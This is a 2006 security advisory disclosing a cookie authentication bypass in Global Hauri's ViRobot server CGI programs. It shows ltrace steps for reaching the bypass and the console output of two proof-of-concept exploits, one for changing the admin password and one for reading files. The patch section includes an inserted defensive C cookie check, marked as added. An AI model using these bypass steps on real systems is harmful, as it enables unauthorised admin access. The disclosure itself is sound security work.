[INetCop Security Advisory] Global Hauri Virobot cookie exploit Feb 22 2006 01:58AM
dong-hun you (xploit hackermail com)

INetCop Security Advisory #2006-0x82-028

* Title: Global Hauri Virobot cookie exploit

0x01. Description

ViRobot Unix/Linux Server is an anti-virus product developed by Global Hauri.
(It is shipped for Unix on SUN SPARC, HP and IBM systems, and for Red Hat Linux.)
To scan and clean a server for viruses, the user must first log in
to ViRobot's dedicated web server.
That web server is based on Apache,
and it provides the web service through CGI programs built into the product.

The product's problem is that many of its common gateway interface (CGI) programs
do not verify the user's login state through the cookie issued at login.
This is a critical authentication vulnerability; as a result,
a malicious attacker can obtain a user's ID and password,
and can use the server without logging in.

test: --

[root@Intel-x86-platform cgi-bin]# pwd
[root@Intel-x86-platform cgi-bin]# ./filescan

<font size=2>You need to authenticate.</font>
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# ltrace ./filescan
__libc_start_main(0x08048c20, 1, 0xbffffbe4, 0x080488b4, 0x0804c3cc <unfinished ...>
__register_frame_info(0x0804f010, 0x0804f188, 0xbffffba4, 0x080488d9, 0x4010748c) = 0x40107fc0
printf("Content-type:text/html\n\n") = 24
getenv("REMOTE_ADDR") = NULL
memset(0xbffff729, '\000', 511) = 0xbffff729
memset(0xbffff6e9, '\000', 63) = 0xbffff6e9
uname(0xbfffd558) = 0
gethostbyname("Intel-x86-platform") = 0x40109f04
inet_ntoa(0x0100007f) = ""
strncpy(0xbfffd4d8, "", 127) = 0xbfffd4d8
getenv("HTTP_COOKIE") = NULL // The HTTP_COOKIE variable must be set.
atoi(0x0804c4f6, 0x0804c4f6, 0, 0xbffffb5c, 0x0804bf1a) = 3
strcmp("#COM-0003;", "#FSC-0003;") = -3
strcmp("#COM-0003;", "#COM-0003;") = 0
printf("<font size=2>%s</font>\n", "You need to authenticate.") = 46
exit(1) = <void>
__deregister_frame_info(0x0804f010, 0xbffffb48, 0x0804c3e1, 0x4010748c, 0xbffffb5c) = 0x0804f188
+++ exited (status 1) +++
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# export HTTP_COOKIE=test // Set the HTTP_COOKIE variable.
[root@Intel-x86-platform cgi-bin]# ltrace ./filescan
getenv("REMOTE_ADDR") = NULL
memset(0xbffff709, '\000', 511) = 0xbffff709
memset(0xbffff6c9, '\000', 63) = 0xbffff6c9
uname(0xbfffd538) = 0
gethostbyname("Intel-x86-platform") = 0x40109f04
inet_ntoa(0x0100007f) = ""
strncpy(0xbfffd4b8, "", 127) = 0xbfffd4b8
getenv("HTTP_COOKIE") = "test"
getenv("HTTP_COOKIE") = "test"
strncmp("test", "ViRobot_ID", 10) = 30
strncmp("test", "ViRobot_PASS", 10) = 30
// This shows that ViRobot_ID and ViRobot_PASS are the cookie names the program uses.
... // Execution continues even though the cookie value does not match.
getenv("REQUEST_METHOD") = NULL // The REQUEST_METHOD variable must be set.
strcmp(NULL, "POST" <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# export REQUEST_METHOD=GET // Set the REQUEST_METHOD variable.
[root@Intel-x86-platform cgi-bin]# ./filescan | more

<title>ViRobot Linux Server Ver 2.0</title>
<select name=dirs class=
'width-full' size=8 onchange='javascript:document.dir_form.submit()'>
<OPTION value="/.">.</OP
<OPTION value="/..">..</
<OPTION value="/etc">etc
<OPTION value="/boot">bo
<form name=web_vrscan method=post action=webvrsc
an target=new>
<td align=right valign=top>
<input type=image src='/images/button_sc
an.gif' border=0><input type=hidden name=web>
[root@Intel-x86-platform cgi-bin]#

With the result above, obtained with an unrelated cookie value,
I could easily get the screen information that the administrator uses after login.


0x02. Vulnerable Packages

Vendor site:
Global HAURI Inc. - http://www.globalhauri.com/ (US & Canada)
HAURI ASIA Pte Ltd. - http://www.hauri.com.sg/ (Singapore)
HAURI JAPAN Inc. - http://www.hauri.co.jp/ (Japan)
China Blue Star Hauri Technology Co., Ltd. - http://www.hauri.com.cn/ (China)
HAURI Latinoamerica S.A. - http://www.haurilatin.com/ (Latin/Mexico)
Hauri do Brazil - http://www.haurilatin.com/ (Latin/Brazil)
Hauri Europe GmbH - http://www.hauri-europe.com/ (Europe)
HAURI Inc. - http://www.hauri.co.kr/ (Korea)

Virobot Linux Server
+Turbo 6x/7x, Laser 5/6x/7x, Miracle 2x, Redhat 6x/7x
Virobot Unix Server

Disclosure Timeline:
2003-08.??: Vulnerabilities found.
2003-08.??: 1st vendor contact. (no response)
2005-09.30: 2nd vendor contact. (no response)
2005-10.03: 3rd vendor contact. (no response)
2005-10.08: Vendor removed its free download page (Ooops).
2006-02.17: 4th vendor contact. (no response)
2006-02.22: Public disclosure.

0x03. Exploit

We have two proof-of-concept programs for these bugs.

#1. Virobot web administrator password change exploit:

[root@Intel-x86-platform virobot]# head 0x82-viropass.c
** 0x82-viropass - Virobot password change exploit (ver2003)
** Our INetCop Security Team found this bug for the first time in 2003.
** At that time, vender Global Hauri was no any reaction.
** Announce unfortunately now.. (This bug that sleep during 2 years)
** exploit result:
[root@Intel-x86-platform virobot]#
[root@Intel-x86-platform virobot]# ./0x82-viropass localhost 8080 x82 hax0r

0x82-viropass - Virobot password change exploit (ver2003)

** This exploit code is may change your virobot server **
** administrator id and password. **

[1] Set socket.
[2] Send code.
[*] Ok, modify admin information. (id: x82, passwd: hax0r)
[*] exploit successfully.
[*] Antivirus lose!

[root@Intel-x86-platform virobot]#

#2. Virobot remote directory file access exploit:

[root@Intel-x86-platform virobot]# head 0x82-virofuk.c
** Virobot cookie bug remote exploit (v0.2) [Proof of Concept]
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc (at) hotmail (dot) com [email concealed]>.
** My World: http://x82.inetcop.org

[root@Intel-x86-platform virobot]#
[root@Intel-x86-platform virobot]# ./0x82-virofuk localhost 8080

Virobot cookie bug remote exploit [Proof of Concept]

[1] Set socket.
[2] Send code.
[3] Take and is storing substance.
[*] Save file name: result.htm
[*] Please wait for a moment ... [OK]
[*] Read result.htm file contents.

[root@Intel-x86-platform virobot]# ls result.htm
[root@Intel-x86-platform virobot]#

An attacker can mount remote attacks through these critical problems.

0x04. Patch

The problem arises in every CGI program that can be used without a valid cookie value.
A function or module that always verifies the user's cookie value must be added to each of them.
Until an official patch is released, as a temporary workaround, a firewall or iptables
can be configured so that only the administrator's IP address can connect to the relevant web pages.
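The following is an added example, not code from the advisory or from ViRobot itself. It shows the kind of fail-closed cookie check that the description (0x01) says is missing and that this patch section calls for, written for a C CGI like the traced filescan binary. The cookie names ViRobot_ID and ViRobot_PASS are taken from the ltrace output above; the credential store, the function names (cookie_get, cgi_authenticated, cgi_gate) and the response strings are assumptions of this example. It also covers the second defect visible in the trace: an absent REQUEST_METHOD is rejected instead of being handed to strcmp as NULL.

```c
/* Added example (not ViRobot's code): a fail-closed cookie check for a C CGI.
 * Assumptions (not from the advisory): the cookie carries ViRobot_ID and
 * ViRobot_PASS, and the credential store below is a constructed stand-in for
 * whatever the real product checks against. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_FIELD 64

/* Constant-time comparison of two NUL-terminated strings, so a mismatch does
 * not leak the position of the first differing byte through timing. */
static int ct_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    size_t diff = la ^ lb;
    size_t n = la < lb ? la : lb;
    for (size_t i = 0; i < n; i++)
        diff |= (size_t)((unsigned char)a[i] ^ (unsigned char)b[i]);
    return diff == 0;
}

/* Extract the value of one "name=value" pair from a Cookie header string
 * such as "a=1; b=2". Returns 1 and copies the value into out on success,
 * 0 if the name is absent, the value is empty, or it does not fit in out. */
int cookie_get(const char *cookie, const char *name, char *out, size_t outlen)
{
    if (cookie == NULL || name == NULL) return 0;
    size_t nlen = strlen(name);
    const char *p = cookie;
    while (*p) {
        while (*p == ' ' || *p == ';') p++;          /* skip separators */
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *end = strchr(v, ';');
            size_t vlen = end ? (size_t)(end - v) : strlen(v);
            if (vlen == 0 || vlen >= outlen) return 0;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return 1;
        }
        const char *next = strchr(p, ';');           /* advance to next pair */
        if (!next) break;
        p = next + 1;
    }
    return 0;
}

/* Constructed credential store standing in for the product's own check.
 * A real CGI would look the ID up in its account or session database. */
static const char *VALID_ID   = "admin";
static const char *VALID_PASS = "example-secret";

/* Returns 1 only when HTTP_COOKIE carries a ViRobot_ID/ViRobot_PASS pair that
 * matches the store. Missing or malformed input fails closed (returns 0)
 * instead of falling through to the protected functionality. */
int cgi_authenticated(const char *http_cookie)
{
    char id[MAX_FIELD], pass[MAX_FIELD];
    if (!cookie_get(http_cookie, "ViRobot_ID", id, sizeof id)) return 0;
    if (!cookie_get(http_cookie, "ViRobot_PASS", pass, sizeof pass)) return 0;
    return ct_equal(id, VALID_ID) && ct_equal(pass, VALID_PASS);
}

/* Gate that every CGI entry point would call before doing any work: refuse
 * when unauthenticated, and treat an absent or unexpected REQUEST_METHOD as a
 * bad request rather than dereferencing NULL as the traced binary did. */
int cgi_gate(const char *http_cookie, const char *request_method)
{
    if (!cgi_authenticated(http_cookie)) {
        printf("<font size=2>You need to authenticate.</font>\n");
        return 0;
    }
    if (request_method == NULL ||
        (strcmp(request_method, "GET") != 0 && strcmp(request_method, "POST") != 0)) {
        printf("Bad request.\n");
        return 0;
    }
    return 1;
}

int main(void)
{
    printf("Content-type:text/html\n\n");
    if (!cgi_gate(getenv("HTTP_COOKIE"), getenv("REQUEST_METHOD")))
        return 1;
    printf("authenticated; protected functionality would run here\n");
    return 0;
}
```

Run from a shell the same way the advisory drives the binary, e.g. `HTTP_COOKIE=test REQUEST_METHOD=GET ./a.out`, and the program stops at the authentication message where filescan kept going; only a cookie whose ViRobot_ID and ViRobot_PASS both match the store passes the gate. The point of the design is that every exit from the check that is not an explicit success is a refusal, which is what the traced program lacked.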

Thank you.

P.S: Sorry for my poor English.

By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,

INetCop Security Home: http://www.inetcop.org
My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
